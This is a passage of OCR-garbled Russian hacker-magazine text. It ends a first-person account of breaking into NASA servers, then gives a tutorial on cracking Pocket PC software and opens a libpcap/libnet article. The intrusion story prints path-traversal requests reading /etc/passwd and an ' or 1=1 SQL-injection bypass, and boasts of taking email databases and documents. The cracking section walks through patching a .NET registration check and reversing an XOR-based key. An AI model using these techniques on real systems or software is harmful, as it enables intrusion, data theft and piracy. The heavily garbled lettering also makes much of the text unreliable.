Зой Ыпкз, АІіаз ОаіаЬазе ТооІ, Азк МСС. Осо- 
бый интерес вызвал раздел РТР Ібріоаб ІШІііу, 
который, судя по названию, существовал 
для аплоадинга файлов на сервер. К сожа- 



лению, это оказалось не так :(, я мог всего 
лишь просматривать содержимое каталогов 
на сервере. Но меня обрадовало то, что было 
разрешено выходить за пределы веб-дирек- 
торий, то есть я свободно читал /еіс, /боте и т.д. 
Пройдясь по остальным разделам админки, 
я не нашел ничего интересного, кроме функ- 
ции Ѵіеѵѵ ОаіаЬазез. Обнаруженные базы гос- 
тевой книги и каких-то отчетов, содержащие 
приличное количество е-таіі-адресов, сразу 
переместились ко мне на винт =). За окном 
уже светало, и я закрыл браузер. Как ни крути, 
но удача на этот раз улыбнулась мне. Правда 
пользы от просмотра каталогов на сервере 
без возможности чтения файлов не много. 
Поэтому нужно было срочно искать выход из 
сложившейся ситуации. И я нашел его. 

О Прорыв по флангу 

Самый удобный способ чтения файлов 
при возможности просмотра содержимого 
директорий — это инклуд. На удаленный 
инклуд рассчитывать не приходилось, а вот 
локальный я решил поискать. Еще просмат- 
ривая насовские поддомены, на некоторых 
сайтах я заметил наличие перл-скриптов. 

При удачном раскладе, грамотном подходе 
и определенной степени криворукости веб- 
программистов из ІЧАЗА, шансы на успешный 
исход резко возрастали. Поэтому я вновь 
обратился к своему любимому поисковику 
(Гуглу) и вбил следующий запрос: «іпигІ:паза. 
доѵПІеіуре:баі». Я надеялся, что найдется 
хотя бы один скрипт, инклудящий файл с рас- 
ширением баі. Гугл вернул мне результат, 
и я начал вглядываться в линки. Первой на 
глаза попалась ссылка вида: 

НРРр : //аіз . дзіе . паза . доѵ/аізЗ/ 

^ итрзрасе/ргіпР ^ итрзрасе . азр?із 




Двадцатилетний хакер похакал 


После крушения шаттла СоІитЬіа 


Неизвестный хакерюга 


Неустановленные товарищи обокрали директора 


многострадальный ірі. паза.доѵ и 


америкосы заявили, что в этом 


сломал целых 9 серверов 


московского представительства ИАЗА при Цент- 


получил 4 месяца тюрьмы. Кроме 


виноваты хакеры. Якобы компью- 


МАЗА, оставив на глав- 


ре подготовки космонавтов. Им удалось ворвать- 


этого, беднягу заставили запла- 


тер, управляющий кораблем, был 


ных страницах послание. 


ся в квартиру и стащить 4 ноута и 1 настольный 


тить $4000 в пользу МАЗА. Лучше 


подключен к интернету, и его быстро 


Его текст можно прочи- 


компьютер :). По оценке правоохранительных 


бы баги фиксили, а не тянули 


поломали. Странно, но никаких сле- 


тать на\А/\А/\А/.зесигіЫаЬ. 


органов, ущерб составил более 720 тысяч руб- 


деньги с бедных студентов... 


дов взлома обнаружить не удалось. 


ги/пеѵѵз/21 2838. обо. 


лей. Реальных «хакеров» так и не нашли. 
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^ взлом 




> Внимание! Все дейс- 
твия, ОПИСАННЫЕ В СТАТЬЕ 
противозаконны! 
Информация предостав- 
лена исключительно с 
ЦЕЛЬЮ ознакомления! 

Ни АВТОР, НИ РЕДАКЦИЯ ЗА 
ТВОИ ДЕЙСТВИЯ ОТВЕТС- 
ТВЕННОСТИ НЕ несут! 




> На нашем йѴй ты 

МОГ БЫ НАЙТИ АРХИВ С 
ИНФОРМАЦИЕЙ, СЛИТОЙ С 
НАСОВСКОГО СЕРВЕРА. Но 
НЕ НАЙДЕШЬ :). 



сотраге=Егие&аиЕоргіпЕ=Егие&ргпЕі1е=ЕсііЕ_ 
ЗрасесгаіЕ . сіаіс 

Но, во-первых, скрипт был написан наАЗР, а во-вторых, 
он жестко фильтровал все входящие данные. Просмот- 
рев еще с десяток урл, я уже собирался перевести идею 
в разряд безнадежных, когда заметил такой линк: 

уплш . езро . паза . доѵ/аѵе-роіаг /зс]песіи1е_ѵіемег . 
сді ?ріс=02_07_баі1у_зсЪесіи1е . сІаД 

Дрожащими от волнения руками я заменил значение 
параметра ріс: 

ІЩДр: А/ѵѵѵ . езро . паза . доѵ/аѵе-ро1аг/зс]тесіи1е_ 
ѵіеѵ/ег . сді?ріс= /еЬс/ 
раззуЩ 

После обновления страницы я увидел не пустой экран 
и не редирект на страницу ошибок, а содержимое 
файла раззѵѵб. В течение минуты я пребывал в состоя- 
нии шока. Затем быстро осмотрел сайт ѵѵѵѵѵѵ.езро.паза. 
аоѵ и обнаружил, что он находится на одном сервере 
с ИНр://сІоиб1 .агс.паза.доѵ . который тоже содержит 
бажный скрипт: 

ІЩДр: //сіоибі . агс . паза . доѵ/іпДех-Ь/зс]тесіи1е_ 

ѵіемегОС8 . сді?ріс= 

ргос/ѵегзіоп 

Таким образом, я получил информацию об ОС, стоящей 
на сервере: 

Ъіпих ѵегзіоп 2 . б . 1 б . 2 1-0 . ІЗ-беТаиН: (деекоѲ 
ЪиіІсПпозІ:) (дсс ѵегзіоп 4.1.0 (ЗЮЗЕ Ъіпих) ) # 

1 Моп СГиІ 17 17:22:44 ЦТС 2006 

Я тут же залез в админку, которую нашел еще до об- 
наружения инклуда, и выбрал оттуда путь к одному из 
файлов. Но при попытке прочитать содержимое этого 
файла бажный скрипт выдал чистый лист. Оказалось, 
что админка и уязвимый перл-скрипт находятся на раз- 
ных серверах :(. То есть я опять лишался возможности 
чтения файлов на сервере, хостящем основной домен 
ѵѵѵѵѵѵ.паза.доѵ. 

Такого облома я никак не ожидал. Расстроенный, я вы- 
ключил ноутбуки лег спать. 

О Облом или удача 

Проснулся я от звона будильника. Глянув на часы, 
тут же сел за стол, придвинув ноут, — пора было про- 
должать взлом. Раз уж мне удалось устроить чтение 
директорий на одном сервере, а файлов — на другом, 
то стоило прощупать обе машины. Но, зайдя по ссылке. 
Нир://сІоиб1.агс.паза.доѵ/іпіех-Ь/зсІ7есІиІе_ѵіеѵѵегЭС8. 
сді?ріс=../../../../../../../../еІс/ИозІз, я вдруг обнаружил, что 
баг был закрыт! Аналогичный результат выдал запрос 
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> Официальный сайт МА5А 



МДр://ѵѵѵѵѵѵ.езро.паза.аоѵ/аѵе-роІаг/зсІіебиІе ѵіеѵѵег. 
сді? ріс=../../../../../../../../е1с/Ііо5І5. 

Админ пропатчил скрипт. Уязвимости больше не сущес- 
твовало. Минуты две я думал о смысле жизни, после 
чего, собравшись с мыслями, загрузил админку. 

На мое удивление, она по-прежнему работала. 

Так как все пути мне отрезали, я решил детально 
изучить содержимое директорий при помощи ад- 
минки на сервере, хостящем ѵѵѵѵѵѵ.паза.аоѵ . Сначала 
я просмотрел каталог /боте. В нем находились две 
директории: еіоисН и гіапсазіег. Первая ссылалась на 
/иОІ/Ноте/еІоисН, а для просмотра второй не хватало 
прав. Как выяснилось позже, в /иОІ/ѵѵеЬЭаіа лежали все 
сайты, находящиеся на сервере. Там были и ѵѵѵѵѵѵ.паза. 
аоѵ . и два десятка других ресурсов. Я спокойно мог про- 
сматривать содержимое почти всех каталогов, включая 
ѵѵѵѵѵѵ.паза.доѵ . Но этого было мало. Мне хотелось слить 
документы, лежащие за пределами веб-директорий. 

Но пока такой возможности я не имел. Спустя время, 
я заметил, что в каталоге, где располагается админка, 
присутствует набор различных перл-скриптов. Большая 
часть из них не работала, но один привлек мое внима- 
ние. Это был скрипт срриіРіІез.сді. При обращении к не- 
му требовалось ввести какое-то слово, по-видимому, 
выполняющее функцию пароля. Все данные передава- 
лись розі-методом. Попробовав пару стандартных пас- 
сов, я ничего не добился. А при подстановке символа 
одинарной кавычки, скрипт возвращал чистый лист. 

Это обстоятельство заинтересовало меня, и я заполнил 
форму таким образом: 



' ог 1=1/* 



Скрипт проглотил мой запрос, и я оказался внутри! 
Опять состояние шока, на этот раз оно длилось 
секунд 30. Но что меня поразило, скрипт позволял 
копировать данные из директории в директорию! 
Поразмыслив, я решил скопировать нужные мне 
файлы в веб-каталоги и затем просто скачать их через 
браузер. К сожалению, моих прав не хватало для 
копирования всей интересующей информации, 
но возможностей и без этого было предостаточно. 
Через несколько часов я закончил работу, слив часть 
доков. 

О Я лежу пластом на хирургическом столе... 

Вот так развивались события. Надо сказать, что админы 
оперативно закрыли почти все дыры, удалив и сам 
скрипт. Но дела это не меняет — баги были. И были они 
в ЫАЗА! 

Напоследок хочу передать привет всем жителям 
США, а также американским спецслужбам. Не скучайте, 
ребята, то ли еще будет =)! □С 
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Реклама. Товар сертифицирован. 




Используйте 
компьютеры ОШі 

и забудьте о проблемах! 





НОМЕ 



Компьютеры ОІсІі линии Ноше - 
идеальный вариант, сочетающий 
в себе все необходимое 
для работы и развлечений. 




Компьютеры ОІсІі линии МиШшесІіа- 
оптимальное решение для тех, 
кто использует мультимедийные 
возможности на полную мощность. 



рр е от 71 00 руб. 



Компьютеры ОІсІі линии Оііісе - 
готовое и экономичное решение, 
необходимое для эффективной 
работы любого офиса. 



Единая справочная: (495) 221 1 1 1 1 ѵѵш.оІФ.ги 



ул. Малышева 20 
Тел.(495) 105-0700 



ул. Трифоновская 45 
Тел. (495) 967-1433 



ул. Донская 32 
Тел. (495) 967-1555 






взлом 



ЮАВВІІСЕ & РОПОЗЕІЧОІ 



ВЗЛОМ ПРОГРАММ ДЛЯ КПК РОСКЕТ РС 



«Я ДОСТАЮ ИЗ ШИРОКИХ ШТАНИН...» МОЙ МАЛЕНЬКИЙ КПК. ЗАПУСКАЮ ПРОГУ И ВИЖУ НАДПИСЬ: «ТРІАЬ РЕРІСЮ 15 ЕХРІРЕЮ!» 
ДАВАЙ ПОСМОТРИМ, ЧТО МОЖНО С ЭТИМ ДЕЛАТЬ. 



середине 80-х годов прошлого 
века мой друг приобрел персо- 
нальный компьютер. Это был 
ЕС 1 841 — шедевр советского 
плагиата. В комплект входили: процессорный 
блок размером 900x900x200 мм, в котором 
стояли камень ІпіеІ 8088 на 4 МГ ц, 640 Кб 
оперативки, 2 флоповода на 5,25" и винт аж на 
4 Мб; блок питания (точно такого же размера, 
как и процессорный блок); телевизор СОА 
с разрешением 320x240 и с 1 6 цветами (но 
видюха могла отображать только 4 цвета из 
шестнадцатицветной палитры). В те времена 
это был предел мечтаний, и мы сгорали от 
зависти. Про цену вообще стыдно было спра- 
шивать. Сейчас же у меня в кармане лежит 
НР Эогпасіа 565 размером 1 32x77x1 7 мм, 
который примерно в 1 00 раз быстрее ЕС 1 841 . 
Да уж, мобильные устройства прочно осели 
в нашей жизни. Уже никого не удивишь кар- 
манным компьютером с процессором 600 МГ ц 
и экраном 640x480, с поддержкой ВІиеіооіН, 
ѴѴіРі, ЗЭ и т.д. 
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По быстродействию КПК уверенно прибли- 
жаются к большим собратьям. На них можно 
посмотреть новый фильм, почитать инте- 
ресную книгу или поиграть в какой-нибудь 
новый квест — да и вообще, можно делать 
все, лишь бы был нужный софт, а добра этого 
на разных интернет-свалках хватает. Одна 
только беда — почти весь софт является 
платным и цена некоторых программ доходит 
аж до нескольких сотен зеленых президентов. 
У честного русского человека таких денег нет, 
по крайней мере, на софт :). Да и большинс- 
тво приложений явно не тянут на такую цену. 
Поэтому не скоро еще «зарастет народная 
тропа» на крякерские сайты. Все бы ничего, 
да вот только количество софта растет не по 
дням, а по часам, и «труженики ножа и то- 
пора» просто не успевают их ломать, так как 
не всегда можно найти нужное лекарство от 
жадности для новенькой проги. Я надеюсь, ты 
понял, к чему я веду. Правильно! У нас и своих 
мозгов хватит. В конце концов, не боги горшки 
обжигают. В этой статье я рассмотрю КПК, 



работающие под управлением операционных 
систем семейства ѴѴіпсІоѵѵз МоЬіІе. РаІтОЗ 
и ЗутЬіап оставим на потом. 

□Ликбез 

Сразу хочу предупредить, что весь материал 
этой статьи дается в исключительно озна- 
комительных целях для тех, кто пишет или 
собирается писать софт для КПК, в качестве 
напоминания о том, как нельзя защищать 
свои программы. Использование материалов 
статьи в иных, в частности противозаконных, 
целях является уголовным преступлением. 
Никакой ответственности за возможное 
применение этой информации на практике 
автор не несет. 

Итак, ты, наверное, слышал, что все совре- 
менные КПК используют АРМ-процессоры, 
которые имеют РІЗС-архитектуру, в отличие 
от обычных ПК, процессоры которых имеют 
СІЗС-архитектуру. Этому можно было бы не 
придавать значения, но АРМ-процессоры 
имеют совсем другую систему команд и, 
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> Структура приложения в РеКесІог 
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> Первый подопытный — диалог ввода 
регистрационного кода 



>Третий подопытный — диалог 
ввода регистрационного кода 



соответственно, другую мнемонику ассемблера. Чтобы не 
грузить себя мегабайтами англоязычной информации, со- 
ветую тебе обратить внимание в первую очередь на то, что 
поможет реализовать бит-хак, а именно на следующее: 

1 . Процессор имеет 1 6 регистров общего назначения: 
П0-П15. Эти регистры могут быть использованы для 
хранения адресов и данных. Кроме этого имеется регистр 
состояния СР8П. В этом регистре есть флаги условия 
(биты 28-31 ): V (28 бит) — Переполнение; С (29 бит) — Пе- 
реполнение/Заем/Расширение; 1 (30 бит) — Флаг нуля; N 
(31 бит) — Отрицание/Меньше. 

2. Тебе обязательно надо знать описание команд услов- 
ных и безусловных переходов: В (ОхЕАхххххх) — Безу- 
словный переход; ВЦОхЕВхххххх) — Вызов функции; В!\ІЕ 
(ОхІАхххххх) — Переход, если в результате сравнения 
получили неравенство; ВЕО (ОхОАхххххх) — Переход, 
если в результате сравнения получили равенство. 

3. При вызове функции адрес возврата записывается не 
в стек, а в регистр І_Я. 

4. Для передачи параметров функций сначала использу- 
ются регистры, а уже потом стек. 



Теперь поговорим непосредственно про программы. В на- 
стоящее время для мобильных окон есть 2 типа приложе- 
ний: приложение формата РогіаЫе ехесиіаЫе и тот же 
РЕ для .пеі Ргатеѵѵогк. Оба типа представляют собой 



ехе-файлы — тот же заголовок, те же секции и таблицы 
импорта. Обычный юзер никогда не заметит между ними 
разницы, но разница есть. Первый тип будет запускаться 
только на КПК, второй может также успешно работать и на 
РС. Это связано со следующим. В программах первого 
типа в секции кода находятся непосредственно команды 
процессора. В большинстве случаев это описанные выше 
АРМ-инструкции, но не всегда, так как не все мобильные 
устройства работают на АРМ-процессорах, есть и другие 
платформы. А вот в программах для .пеі секция кода 
представляет собой некоторый объектный код, который 
называется МЗІІ_. При запуске они, якобы, компилируются 
в привычный для процессора код и выполняются уже на 
конкретной платформе. В связи с тем, что одна и та же 
программа будет работать как на КПК, так и на РС, такая 
технология дает большие возможности для разработчи- 
ков. Но также она дает их для крякеров, так как позволяет 
полностью восстановить исходный код программы! ! ! 
Кажется невероятным? Но это так! Не буду томить и сразу 
перейду к паре примеров для .пеі Ргатеѵѵогк. А потом 
рассмотрим обычные рогіаЫе ехесиіаЫе. 

□ Подопытный № 1 (раІсН) 

Программы под .пеі Ргатеѵѵогк включают в себя мета- 
данные. В них содержится вся информация о классах, 
свойствах и методах, а также поля, имеющие оригиналь- 
ное название. Именно поэтому .пеі-программы хорошо 

поддаются деком- 
пиляции. Давай 
рассмотрим пару 
прог: одну я про- 
патчу, а для второй 
напишу кейген. 
Названия программ 
не привожу для того, 
чтобы не бросать 
тень на авторов 
и не подставляться 
самому, но я думаю, 
ты их узнаешь. Итак, 



«В НАСТОЯЩЕЕ ВРЕМЯ 
ДЛЯ МОБИЛЬНЫХОКОН ЕСТЬ 
2 ТИПА ПРИЛОЖЕНИЙ: ПРИ- 
ЛОЖЕНИЕ ФОРМАТА РОВТАВЬЕ 
ЕХЕСІІТАВЬЕ И ТОТ ЖЕ РЕ ДЛЯ 
.МЕТРРАМЕѴѴОРК» 




> Полное описание 
архитектуры и команд 
АРМ ты сможешь найти 
на ѵѵѵѵѵѵ.агіті.соіп. 




> ІІсІазт идет вместе с. 
пеіЗРК — ищи на ѵѵѵѵѵѵ. 

ІТІІСГОЗОІІСОПП . 



>МісгозоК Оеѵісе 
Етиіаіог — эмулятор 
Роскеі РС, он входит 
в состав ѴізиаІ Зіисііо 
2005. Его также можно 
найти на ѵѵѵѵѵѵ. ппісгозой. 
- сот . 



> Все интересующие 
опкоды можно найти 
в МЗйЫ или на ѵѵѵѵѵѵ. 

ІТІІСГІЗОЙ.СОПП . 
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> Первый подопытный — незарегистриро- 
ванная версия 




ІІ.А 5 М ИДЕТ 
ВМЕСТЕ С .МЕТ 
РВАМЕѴѴОКК 
-ИЩИ В ПАП- 
КЕ ѴѴШ 00 ѴѴ 5 Ѵ 
МІСК 050 ЕТ .ЫЕТ\ 
РВАМЕѴѴОВКѴ 



поехали. Ты, наверное, уже догадываешь- 
ся, что это приложение написано под .пеі 
Поэтому мне будет нужен дизассемблер. 

Я буду использовать іібазт, ііазт и РеІІесіог. 

С помощью первых двух можно дизассембли- 
ровать исходную программу в іі-инструкции, 
поправить ее и затем заново откомпилиро- 
вать. Мне они понадобятся для определения 
местоположения интересующих меня команд, 
просмотра их опкодов и шестнадцатерич- 
ных значений. Также я буду использовать 
ЯеІІесІог, он способен восстановить исходный 
код приложения на любом из языков, поз- 
воляющих писать под .пеі, а именно ѴС++, 

С#, ѴізиаІ Вазіс, ЭеІрНі и ІІ_. Возможно, кто-то 
скажет, что это лишняя работа и можно обой- 
тись одним рефлектором. Пусть этот кто-то 
идет лесом — это обучал ка, а не мастер- 
класс. Чтобы не путаться в куче проводов, все 
свои опыты я буду проводить на эмуляторе 
РоскеіРС. Когда будешь химичить сам, поми- 
мо эмулятора, не забудь установить МісгозоЙ 
АсііѵеЗупс. Для того чтобы связать эти две 
программы вместе, необходимо выполнить 
следующие действия: 



• запустить АсйѵеЗупс (он сразу появиться 
в трее); 

• открыть Эеѵісе Етиіаіог Мападег (по умол- 
чанию он находится в каталоге СЛРгодгат 
РіІезХМісгозоЙ Оеѵісе ЕтиІаіог\1 ,0\); 

• в Оеѵісе Етиіаіог Мападег выбрать «Роскеі 
РС 2003 ЗЕ Етиіаіог» , затем в меню выбрать 
«Соппесі:»; 

• после того как откроется окно эмулятора, 
в Оеѵісе Етиіаіог Мападег выбрать соедине- 
ние СгасІІе; делается это в контекстном меню 
при помощи клика правой кнопкой по «Роскеі: 
РС 2003 ЗЕ Етиіаіог». 
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После выполнения всех перечисленных выше 
действий программы автоматически соединят- 
ся. Теперь можно приступать непосредственно 
к установке приложения. Эта процедура в КПК 
не сильно отличается от таковой в ПК :). 
Запустив уже установленное приложение, 
я читаю диагноз. В нем говорится, что больной 
проживет максимум 15 дней, если не дать 
ему лекарство :(. Регистрация приложения 
осуществляется вводом 16-символьного 
ключа. Смотрю, что внутри у этой программы, 
открыв ее в рефлекторе. Сразу бросаются 
в глаза пространство имен ЗІірзігеатЗоІиііопз. 
МуРедізігаііоп и 2 метода, находящиеся там: 
НазН (Зігіпд): Зігіпд и ЕІпНазИ (Зігіпд): Зігіпд. 

Но я пока оставляю их и смотрю дальше. 
Следующее, что может меня заинтересовать, 

— это обработчик нажатия кнопки « Редізіег» , 
он называется «ЫпРедізіег_СІіск(ОЬіесі, 
ЕѵепіАгдз): Ѵоіб». Обработчик достаточно 
прост, он собирает введенный код в одну 
строку и передает его функции ІІпНазб. Затем, 
если длина строки, полученной после ЕІпНазИ, 
будет больше «тВІиеЗсНе» (условие № 1) 
и будет начинаться с «тВІиеЗсНе» (условие 
№ 2), можно увидеть поздравления. Автор 
также оставил в приложении функцию НазН, 
вероятно, чтобы доброжелатели не мучались 
с взломом программы :). Но я не ищу легких пу- 
тей, поэтому не буду пользоваться оставленной 
лазейкой. Я просто пропатчу дизассемблирую 
прогу с помощью іібазт, но не правкой одного 
байта, а исправлением функции ЕІпНазб, чтобы 
она всегда возвращала строку «тВІиеЗсНе» 
с несколькими пробелами в конце (для удов- 
летворения условию № 1 ). Теперь я делаю ее 
дамп, то есть дизассемблирую, выбрав в меню 
соответствующий пункт, при этом выставляю 
все галочки. Итак, дамп готов. Теперь найду 



в нем функцию ІІпНазН. Она располагается 
почти в конце файла и обнаруживается по 
значению 0хЬ7сІс, это ее РѴА. Теперь вернусь 
к рефлектору и посмотрю на функцию ЕІпНазІі 
в нем. В конце этой функции есть строка: 

■Ьехіі . Тгіт (" " . ТоСДагАггау ( ) ) ; 

Заменю ее: 

геДигп "тВІиеЗсДе" 

Для этого снова вернусь к дизассемблиро- 
ванному дампу. Все строки хранятся в одном 
месте программы (блок «ІІзег Зігіпдз»). Мне 
нужно найти строку подходящей длины, 
исправить ее и затем в инструкции Ібзі указать 
ее идентификатор. Например, строка «рісісоп. 
Ітаде» вполне подойдет, ее идентификатор 
— 70000067. Теперь ее нужно заменить: 



"тВІиеЗсДе" 



При этом важно не забывать о пробелах, а так- 
же о том, что это уникод. Теперь приступаю 
к замене: 

ДехДІ.Тгіт (" ". ТоСДагАггау ( ) ) ; 

Заменяю строкой: 

геДигп "тВІиеЗсДе" 

Оставшиеся байты до инструкции Іеаѵез 
ІІ__01 с8 поменяю на 00 (это код пор'а). После 
всех проделанных действий можно приступать 
к регистрации. Ввожулюбой регистрационный 
номер, в результате чего программа перестает 
отсчитывать дни до своей кончины :). 
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«НЕ БУДУ ХОДИТЬ ВОКРУГ 
ДА ОКОЛО, А СКАЖУ СРА- 
ЗУ, ЧТО САМОЕ УДОБНОЕ 
СРЕДСТВО ДЛЯ КОВЫРЯНИЯ 
В РОРТАВЬЕ ЕХЕСІЛАВЬЕ РОР 
АРМ — ЭТО ЮА» 



□ Подопытный № 2 (кеудеп) 

Патч подходит, когда важен не процесс, 
а результат. Но ты ведь уже что-то начина- 
ешь понимать в кряке, поэтому вершина 
твоего мастерства — кейген. Установив 
программу и запустив ее, видим, что прога 
будет работать только 7 дней, при этом 
регистрация происходит по схеме «Имя 
владельца/Код». Что же, открываю уже 
полюбившийся рефлектор и в течение пяти 
часов ищу обработчик кнопки «ОК», кото- 
рую нажимает пользователь. Шутка :)! 

На это ушло не более 30 секунд и пяти 
кликов мышки — функция ЬіпОК_СІіск. 

Все достаточно примитивно. Есть функция 
проверки кода на валидность ІзВедКеуОК, 
которая получает имя пользователя и код. 
Можно, конечно, сразу пропатчить, но 
ведь я решил написать кейген, поэтому 
смотрю функцию ІзВедКеуОК. Алгоритм 
не сложный, но разбираться лень. Просто 
беру и копирую текст функции от начала до 
сравнения строк «іехіі » и «Собе», создаю 
свой проект, а в нем — новую функцию, 
которая будет возвращать строку, и затем 
просто вставляю в нее скопированный 
текст. Ну, а все остальное, думаю, если за- 
хочешь, ты сможешь сделать сам. А если не 
захочешь, просто посмотри на последнее 
условие программы: должно быть, автор 

— полный дегенерат, если оставил заднюю 
дверь открытой. 

О Подопытный № 3 (кейген) 

Не буду ходить вокруг да около, а скажу 
сразу, что самое удобное средство для 
ковыряния в РогіаЫе ехесиіаЫе іог АРМ 

— это ЮА. А если к нему добавить плагин 
\А/іпсе_гетоіе_агт, позволяющий отлажи- 
вать приложения для КПК, то ему вообще 
цены не будет. Я слышал про чудаков, 
которые используют Мігозоіі ЕтЬеббеб 
ѴізиаІ С++ для отладки и анализа кода, но, 



говорят, они скоро вымрут :). Для следую- 
щих исследований мне также понадобится 
связка МісгозоК Эеѵісе Етиіаіог & МісгозоЙ 
АсІіѵеЗупс. Как обычно устанавливаю 
приложение. Пробую его запустить — при- 
ложение сообщает, что будет жить 7 дней. 
Регистрация при этом происходит по схеме 
«РігзіМате/І_а5іІ\Іате/РедізігаііопКеу>>. Пос- 
ле ввода произвольных данных передо мной 
на экране появляется обычный МеззадеВох 
со строкой «Собе із іпсоггесі». Далее 
копирую приложение на ПК и открываю его 
в ЮА, предварительно выбрав тип приложе- 
ния Роскеі РС АРМ ЕхесиіаЫе. После того 
как ЮА завершит анализ кода, ищу строку 
«Собе із іпсоггесі». Для этого нужно нажать 
ЗЫЙ+Р10. После непродолжительных 
поисков нахожу строку «Собе із іпсоггесі», 
которая вызывается всего один раз по адре- 
су .іехі:00022294. Посмотрев внимательно 
на код, можно заметить, что переход на эту 
часть программы осуществляется с адреса 
.іехі:0002226С, если в Р0 находится значе- 
ние, отличное от -1 . Следовательно, побли- 
зости должен быть блок, осуществляющий 
проверку введенного кода и возвращаю- 
щий результат проверки. Этим блоком яв- 
ляется функция зиЬ_1 1 А08, вызов которой 
осуществляется по адресу .іехі:0002225С. 
Смотрю, как и что делает эта функция, для 
чего запускаю программу под отладчиком, 
предварительно поставив бряк, с помощью 
Р2 по адресу. іехі:0002225С. Для того что- 
бы запустить отладку, достаточно нажать 
Р9. ЮА попытается найти прило- 
жение на удаленном компьютере (если 
она его не обнаружит, то предложит 
скопировать его туда). Пробую зарегистри- 
роваться, введя данные: Сгаскег, Сгаскег, 

1 1 1222. Вот я и остановился по адресу 
0002225С. Посмотрю, что при 
этом находится в регистрах, для 
этого мне понадобится окно «ОепегаІ 



гедізіегз». В РИ передается адрес 
0006Е5Е8, который указывает на стро- 
ку «СПАСКЕПСПАСКЕР», то есть ЕігзіЫате 
и І_аз1Мате передаются одной строкой. 

В регистре Я5 находится адрес 0006Е580, 
по которому располагается достаточно 
интересная последовательность символов: 
0x1 7\0х1 7\0х1 7\0х1 4\0х1 4\0х1 4. Возможно, 
она имеет какое-то отношение к проверке 
введенных данных, но не буду торопиться 
с выводами. В остальных регистрах нет 
ничего интересного. Теперь захожу в функ- 
цию по Р7 и выясняю истину. Функция имеет 
достаточно малый размер. Она не делает 
ничего особенного, кроме проверки того, 
чтобы строки, переданные через Я1 и Я5, 
были не нулевой длины, и посимвольной 
проверки строк, переданных через Я1 и Я5. 
Следовательно, строка «0х17\0х17\0х17\ 

0x1 4\0х1 4\0х1 4» — это каким-то образом 
извращенный код 1 1 1222, и моя задача 
— отследить место формирования этой 
строки и понять алгоритм ее формиро- 
вания. Для этого ставлю бряк по адресу 
00022190 (листинги ищи на нашем ЭѴЭ) 
и снова пробую зарегистрироваться. 
Дохожу до .іехі:000221С0 и попадаю в ин- 
тересный цикл, который делает буквально 
следующее: 



1. берет первый символ введенного кода; 

2. ксоритна0х26; 

3. переходит к следующему символу и, если 
не конец строки, переходит на пункт 2. 

Вот и вся защита. Теперь проверяю это, 
ксорю строку «СЯАСКЕЯСЯАСКЕЯ» на 
0x26, получаю следующий результат 
— «еідетсіеідетсі». Ввожу и получаю 
поздравления. 

О Выводы 

Итак, какие же можно сделать выводы? 

А выводы весьма печальные — несмотря на 
высокотехнологичность всех современных 
карманных компьютеров, лицензионная 
защита программного обеспечения для 
них практически отсутствует. Приведенные 
выше примеры приложений взяты произ- 
вольно, помимо них, я исследовал еще 
штук 30, и везде уровень защиты 
был примерно такой же. Из всех рассмот- 
ренных мною прогни одна не былазапако- 
вана, хотя говорят, что есть какие-то 
паковщики. Разработчикам есть, над чем за- 
думаться. Как говорится, семь раз протесть, 
один раз продай. 2-Е 
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СОЗДАЕМ ПРОДВИНУТЫЙ 
БОЕВОЙ СОФТ! 




БИБЛИОТЕКИ ЫВРСАР И ЫВЫЕТ В ДЕЙСТВИИ 



НА БИБЛИОТЕКАХ ЫВРСАР И ЫВЫЕТ РАБОТАЮТ ТЫСЯЧИ ЗНАМЕНИТЫХ ПРОГРАММ, ТАКИХ КАК СКАНЕР ЫМАР, СНИФЕРЫ ТСРОІІМР 
И ЕТТЕРСАР, СИСТЕМА ОБНАРУЖЕНИЯ АТАК 5Ы ОРТ. АВТОРОМ БИБЛИОТЕКИ ЫВЫЕТЯВЛЯЕТСЯ БЫВШИЙ РЕДАКТОР ЛЕГЕНДАР- 
НОГО ЭЛЕКТРОННОГО ЖУРНАЛА РНРАСК — РОІІТЕ (МІКЕ 5СНІРРМАЫ). А В 55-М НОМЕРЕ РНРАСК БИБЛИОТЕКЕ ЫВЫЕТ БЫЛА ПОС- 
ВЯЩЕНА ОТДЕЛ ЬНАЯ СТАТЬЯ, КОТОРАЯ ВЫЗВАЛА БОЛ ЬШОЙ РЕЗОНАНС СРЕДИ ЧИТАТЕЛЕЙ. ЧТО ЖЕ ТАКОГО ПРИМЕЧАТЕЛЬНОГО 
В ЭТИХ БИБЛИОТЕКАХ? ВОТ ОБ ЭТОМ Я ТЕБЕ СЕЙЧАС И РАССКАЖУ, А ЕЩЕ НАУЧУ ПИСАТЬ ПРОГРАММЫ С ИХ ИСПОЛЬЗОВАНИЕМ. 



іЬрсар и Іііопеі — это разные 
библиотеки, предназначенные 
для разных задач и создан- 
ные разными авторами, но, по 
меткому выражению Майка Шифмана, они 
являются братьями (или сестрами). Библиоте- 
ка ІіЬрсар предназначена для извлечения па 
кетов из сети и их анализа. Библиотека ІіЬпеІ: 
используется для обратного действия — для 
генерации пакетов произвольного формата 
и отправки в сеть. Библиотека ІіЬрсар (Раскеі 
Саріиге ІіЬгагу) была создана Ван Якобсоном 
(Ѵап ЭасоЬзоп), Крегом Лерисом (Сгаід І_егез) 
и Стивом Маккеном (Зіеѵе МсСаппе). Твоя 
программа может задействовать либо только 
одну из этих библиотек, либо сразу обе. 

□ Все прелести ІіЬпеІ & ІіЬрсар 

Чтобы осознать всю прелесть этих библиотек, 
нужно попробовать программировать без них. 
Я попробовал, поэтому могу поделиться опытом. 
Допустим, тебе нужно написать снифер с под- 
держкой фильтрации пакетов, позволяющей 
задавать протокол, порт, ІР-адрес, флаги или 
какие-либо другие данные пакетов, которые 



требуется захватывать. Создание в програм- 
ме полноценного фильтра может занять не 
один день или даже месяц. С использовани- 
ем же библиотеки ІіЬрсар мощный фильтр, 
сравнимый с тем, что присутствует в утилите 
ісрсіитр, встраивается в программу буквально 
с помощью нескольких строчек кода. 

Другой пример. Тебе нужно написать сканер 
портов с поддержкой ЗУЫ-, РІЫ-, Х-плаз-, 

ЫиІІ-, АСК- и ЕЮР-сканирования. Для этого 
необходимо самостоятельно формировать и 
заполнять поля заголовков сетевых пакетов, 
рассчитывать контрольные суммы и т.д. 

С библиотекой ІіЬпеі все значительно проще: 
СРС и основные поля она заполнит сама, а 
подробные мануалы, которые идут вместе с 
библиотекой, помогут тебе подобрать остав- 
шееся. Не жизнь, а просто сказка! 

У библиотек ІіЬрсар и ІіЬпеі есть еще один 
большой плюс — они реализованы для 
многих операционных систем, в том числе для 
ѴѴіпсІоѵѵз, поэтому программа, основанная на 
этих библиотеках, будет переносимой. 

